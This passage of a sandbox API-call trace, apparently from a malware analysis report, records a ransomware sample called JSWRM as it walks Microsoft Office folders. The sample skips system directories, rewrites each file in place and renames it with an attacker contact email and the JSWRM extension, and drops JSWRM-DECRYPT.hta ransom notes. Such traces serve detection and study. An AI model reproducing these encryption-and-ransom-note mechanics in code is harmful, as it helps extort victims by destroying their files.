[0132.125] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0132.126] CloseHandle (hObject=0x45c) returned 1 [0132.126] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Installed_schemas16.xss" (normalized: "c:\\program files\\microsoft office\\root\\office16\\installed_schemas16.xss"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Installed_schemas16.xss.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\installed_schemas16.xss.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.127] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd2f517e4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd2f517e4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd3226418, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x658f8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Interceptor.dll", cAlternateFileName="INTERC~1.DLL")) returned 1 [0132.127] lstrcmpiW (lpString1="Interceptor.dll", lpString2=".") returned 1 [0132.127] lstrcmpiW (lpString1="Interceptor.dll", lpString2="..") returned 1 [0132.127] lstrcmpiW (lpString1="Interceptor.dll", lpString2="...") returned 1 [0132.127] lstrcmpiW (lpString1="Interceptor.dll", lpString2="windows") returned -1 [0132.127] lstrcmpiW (lpString1="Interceptor.dll", lpString2="recovery") returned -1 [0132.127] lstrcmpiW (lpString1="Interceptor.dll", lpString2="perflogs") returned -1 [0132.127] lstrcmpiW (lpString1="Interceptor.dll", lpString2="documents and settings") returned 1 [0132.127] lstrcmpiW (lpString1="Interceptor.dll", lpString2="$RECYCLE.BIN") returned 1 [0132.127] lstrcmpiW (lpString1="Interceptor.dll", lpString2="system volume information") returned -1 [0132.127] lstrcmpiW (lpString1="Interceptor.dll", lpString2="msocache") returned -1 [0132.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interceptor.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0132.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interceptor.dll", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Interceptor.dll", lpUsedDefaultChar=0x0) returned 15 [0132.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interceptor.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0132.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interceptor.dll", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Interceptor.dll", lpUsedDefaultChar=0x0) returned 15 [0132.127] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd2b97d2d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd2b97d2d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2d87bf9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb60, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Interceptor.tlb", cAlternateFileName="INTERC~1.TLB")) returned 1 [0132.127] lstrcmpiW (lpString1="Interceptor.tlb", lpString2=".") returned 1 [0132.127] lstrcmpiW (lpString1="Interceptor.tlb", lpString2="..") returned 1 [0132.127] lstrcmpiW (lpString1="Interceptor.tlb", lpString2="...") returned 1 [0132.127] lstrcmpiW (lpString1="Interceptor.tlb", lpString2="windows") returned -1 [0132.127] lstrcmpiW (lpString1="Interceptor.tlb", lpString2="recovery") returned -1 [0132.127] lstrcmpiW (lpString1="Interceptor.tlb", lpString2="perflogs") returned -1 [0132.127] lstrcmpiW (lpString1="Interceptor.tlb", lpString2="documents and settings") returned 1 [0132.128] lstrcmpiW (lpString1="Interceptor.tlb", lpString2="$RECYCLE.BIN") returned 1 [0132.128] lstrcmpiW (lpString1="Interceptor.tlb", lpString2="system volume information") returned -1 [0132.128] lstrcmpiW (lpString1="Interceptor.tlb", lpString2="msocache") returned -1 [0132.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interceptor.tlb", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0132.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interceptor.tlb", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Interceptor.tlb", lpUsedDefaultChar=0x0) returned 15 [0132.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interceptor.tlb", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0132.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interceptor.tlb", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Interceptor.tlb", lpUsedDefaultChar=0x0) returned 15 [0132.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.128] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Interceptor.tlb" (normalized: "c:\\program files\\microsoft office\\root\\office16\\interceptor.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0132.129] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=47968) returned 1 [0132.129] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.129] ReadFile (in: hFile=0x45c, lpBuffer=0x27b348, nNumberOfBytesToRead=0xbb60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345ec04*=0xbb60, lpOverlapped=0x0) returned 1 [0132.134] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.134] WriteFile (in: hFile=0x45c, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xbb60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345ec00*=0xbb60, lpOverlapped=0x0) returned 1 [0132.135] CloseHandle (hObject=0x45c) returned 1 [0132.135] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Interceptor.tlb" (normalized: "c:\\program files\\microsoft office\\root\\office16\\interceptor.tlb"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Interceptor.tlb.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\interceptor.tlb.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.136] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbdc8437, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1c860, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="INTLDATE.DLL", cAlternateFileName="")) returned 1 [0132.136] lstrcmpiW (lpString1="INTLDATE.DLL", lpString2=".") returned 1 [0132.136] lstrcmpiW (lpString1="INTLDATE.DLL", lpString2="..") returned 1 [0132.137] lstrcmpiW (lpString1="INTLDATE.DLL", lpString2="...") returned 1 [0132.137] lstrcmpiW (lpString1="INTLDATE.DLL", lpString2="windows") returned -1 [0132.137] lstrcmpiW (lpString1="INTLDATE.DLL", lpString2="recovery") returned -1 [0132.137] lstrcmpiW (lpString1="INTLDATE.DLL", lpString2="perflogs") returned -1 [0132.137] lstrcmpiW (lpString1="INTLDATE.DLL", lpString2="documents and settings") returned 1 [0132.137] lstrcmpiW (lpString1="INTLDATE.DLL", lpString2="$RECYCLE.BIN") returned 1 [0132.137] lstrcmpiW (lpString1="INTLDATE.DLL", lpString2="system volume information") returned -1 [0132.137] lstrcmpiW (lpString1="INTLDATE.DLL", lpString2="msocache") returned -1 [0132.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INTLDATE.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0132.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INTLDATE.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INTLDATE.DLL", lpUsedDefaultChar=0x0) returned 12 [0132.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INTLDATE.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0132.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INTLDATE.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INTLDATE.DLL", lpUsedDefaultChar=0x0) returned 12 [0132.137] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd2a40778, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd2a40778, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2be41af, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x312a8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="JitV.dll", cAlternateFileName="")) returned 1 [0132.137] lstrcmpiW (lpString1="JitV.dll", lpString2=".") returned 1 [0132.137] lstrcmpiW (lpString1="JitV.dll", lpString2="..") returned 1 [0132.137] lstrcmpiW (lpString1="JitV.dll", lpString2="...") returned 1 [0132.137] lstrcmpiW (lpString1="JitV.dll", lpString2="windows") returned -1 [0132.137] lstrcmpiW (lpString1="JitV.dll", lpString2="recovery") returned -1 [0132.137] lstrcmpiW (lpString1="JitV.dll", lpString2="perflogs") returned -1 [0132.137] lstrcmpiW (lpString1="JitV.dll", lpString2="documents and settings") returned 1 [0132.137] lstrcmpiW (lpString1="JitV.dll", lpString2="$RECYCLE.BIN") returned 1 [0132.137] lstrcmpiW (lpString1="JitV.dll", lpString2="system volume information") returned -1 [0132.137] lstrcmpiW (lpString1="JitV.dll", lpString2="msocache") returned -1 [0132.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JitV.dll", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0132.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JitV.dll", cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JitV.dll", lpUsedDefaultChar=0x0) returned 8 [0132.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JitV.dll", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0132.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JitV.dll", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JitV.dll", lpUsedDefaultChar=0x0) returned 8 [0132.137] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a527709, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x3a527709, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x3a527709, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0132.137] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0132.137] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0132.138] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0132.138] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0132.138] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0132.138] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0132.138] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0132.138] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0132.138] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0132.138] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0132.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0132.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0132.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0132.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0132.138] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d91898, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1d91898, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4e2564e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xa1658, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="LGND.DLL", cAlternateFileName="")) returned 1 [0132.138] lstrcmpiW (lpString1="LGND.DLL", lpString2=".") returned 1 [0132.138] lstrcmpiW (lpString1="LGND.DLL", lpString2="..") returned 1 [0132.138] lstrcmpiW (lpString1="LGND.DLL", lpString2="...") returned 1 [0132.138] lstrcmpiW (lpString1="LGND.DLL", lpString2="windows") returned -1 [0132.138] lstrcmpiW (lpString1="LGND.DLL", lpString2="recovery") returned -1 [0132.138] lstrcmpiW (lpString1="LGND.DLL", lpString2="perflogs") returned -1 [0132.138] lstrcmpiW (lpString1="LGND.DLL", lpString2="documents and settings") returned 1 [0132.138] lstrcmpiW (lpString1="LGND.DLL", lpString2="$RECYCLE.BIN") returned 1 [0132.138] lstrcmpiW (lpString1="LGND.DLL", lpString2="system volume information") returned -1 [0132.138] lstrcmpiW (lpString1="LGND.DLL", lpString2="msocache") returned -1 [0132.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LGND.DLL", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0132.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LGND.DLL", cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LGND.DLL", lpUsedDefaultChar=0x0) returned 8 [0132.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LGND.DLL", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0132.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LGND.DLL", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LGND.DLL", lpUsedDefaultChar=0x0) returned 8 [0132.138] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x19889710, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19889710, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Library", cAlternateFileName="")) returned 1 [0132.138] lstrcmpiW (lpString1="Library", lpString2=".") returned 1 [0132.138] lstrcmpiW (lpString1="Library", lpString2="..") returned 1 [0132.139] lstrcmpiW (lpString1="Library", lpString2="...") returned 1 [0132.139] lstrcmpiW (lpString1="Library", lpString2="windows") returned -1 [0132.139] lstrcmpiW (lpString1="Library", lpString2="recovery") returned -1 [0132.139] lstrcmpiW (lpString1="Library", lpString2="perflogs") returned -1 [0132.139] lstrcmpiW (lpString1="Library", lpString2="documents and settings") returned 1 [0132.139] lstrcmpiW (lpString1="Library", lpString2="$RECYCLE.BIN") returned 1 [0132.139] lstrcmpiW (lpString1="Library", lpString2="system volume information") returned -1 [0132.139] lstrcmpiW (lpString1="Library", lpString2="msocache") returned -1 [0132.139] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\library\\jswrm-decrypt.hta")) returned 0xffffffff [0132.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.139] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\library\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0132.140] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.141] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0132.152] CloseHandle (hObject=0x45c) returned 1 [0132.152] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\library\\jswrm-decrypt.hta")) returned 0x20 [0132.152] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x19889710, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x456b2b7f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x232040 [0132.152] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0132.152] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x19889710, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x456b2b7f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.152] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0132.152] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0132.152] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12b7378, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xafa146a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xafa146a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="Analysis", cAlternateFileName="")) returned 1 [0132.152] lstrcmpiW (lpString1="Analysis", lpString2=".") returned 1 [0132.152] lstrcmpiW (lpString1="Analysis", lpString2="..") returned 1 [0132.152] lstrcmpiW (lpString1="Analysis", lpString2="...") returned 1 [0132.152] lstrcmpiW (lpString1="Analysis", lpString2="windows") returned -1 [0132.152] lstrcmpiW (lpString1="Analysis", lpString2="recovery") returned -1 [0132.152] lstrcmpiW (lpString1="Analysis", lpString2="perflogs") returned -1 [0132.152] lstrcmpiW (lpString1="Analysis", lpString2="documents and settings") returned -1 [0132.152] lstrcmpiW (lpString1="Analysis", lpString2="$RECYCLE.BIN") returned 1 [0132.153] lstrcmpiW (lpString1="Analysis", lpString2="system volume information") returned -1 [0132.153] lstrcmpiW (lpString1="Analysis", lpString2="msocache") returned -1 [0132.153] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\Analysis\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\library\\analysis\\jswrm-decrypt.hta")) returned 0xffffffff [0132.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.155] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\Analysis\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\library\\analysis\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.156] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.156] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0132.157] CloseHandle (hObject=0x238) returned 1 [0132.158] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\Analysis\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\library\\analysis\\jswrm-decrypt.hta")) returned 0x20 [0132.158] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\Analysis\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12b7378, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xafa146a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x456d8d85, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2257e0, cFileName=".", cAlternateFileName="")) returned 0x232140 [0132.158] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0132.158] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e5c0 | out: 